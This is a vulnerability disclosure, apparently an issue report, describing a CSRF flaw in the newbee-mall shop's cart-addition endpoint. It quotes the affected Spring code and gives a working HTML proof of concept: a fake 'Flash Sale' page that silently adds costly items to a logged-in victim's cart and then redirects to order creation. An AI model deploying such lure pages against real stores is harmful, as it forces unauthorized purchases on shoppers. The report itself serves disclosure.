CSRF Vulnerability in Shopping Cart Item Addition

[flashzyc]

CSRF Vulnerability in Shopping Cart Item Addition

Summary

A CSRF vulnerability exists in the shopping cart addition endpoint /shop-cart (POST). Attackers can add arbitrary items to users' shopping carts, which can be chained with the order creation CSRF to force unauthorized purchases.

Vulnerability Details

Configuration-Level Issue

File: src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(newBeeMallLoginInterceptor)
                .addPathPatterns("/shop-cart/**");
        // ❌ No CSRF token validation configured
    }
}

Endpoint-Level Code Analysis

File: src/main/java/ltd/newbee/mall/controller/mall/ShoppingCartController.java (Lines 63-76)

@PostMapping("/shop-cart")
@ResponseBody
public Result saveNewBeeMallShoppingCartItem(@RequestBody NewBeeMallShoppingCartItem newBeeMallShoppingCartItem,
                                             HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    newBeeMallShoppingCartItem.setUserId(user.getUserId());
    // ❌ No CSRF token validation
    // ⚠️ Accepts JSON payload from any origin
    String saveResult = newBeeMallShoppingCartService.saveNewBeeMallCartItem(newBeeMallShoppingCartItem);
    if (ServiceResultEnum.SUCCESS.getResult().equals(saveResult)) {
        return ResultGenerator.genSuccessResult();
    }
    return ResultGenerator.genFailResult(saveResult);
}

Security Issues:

1. ❌ No CSRF token validation
2. ⚠️ Accepts JSON requests with credentials: include
3. ⚠️ Can be chained with order creation for full attack

Proof of Concept (PoC)

<!DOCTYPE html>
<html>
<head>
    <title>Special Offer - Limited Time!</title>
</head>
<body>
    <h1>🎁 Flash Sale! 90% OFF</h1>
    <p>Adding special offers to your cart...</p>
    
    <script>
        // Add expensive items to victim's shopping cart
        var itemsToAdd = [
            {goodsId: 10047, goodsCount: 5},   // Expensive item 1
            {goodsId: 10048, goodsCount: 10},  // Expensive item 2
            {goodsId: 10049, goodsCount: 3}    // Expensive item 3
        ];
        
        itemsToAdd.forEach(function(item) {
            fetch('http://localhost:28089/shop-cart', {
                method: 'POST',
                credentials: 'include',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify(item)
            })
            .then(response => response.json())
            .then(data => console.log('Added item:', item.goodsId));
        });
        
        // Step 2: Redirect to order creation (chain attack)
        setTimeout(function() {
            window.location.href = 'http://localhost:28089/saveOrder';
        }, 2000);
    </script>
</body>
</html>

Impact

Unauthorized shopping cart manipulation leading to forced purchases - When combined with order creation CSRF, attackers can force users to buy unwanted expensive items.

---

CVSS Score: 7.6 (High)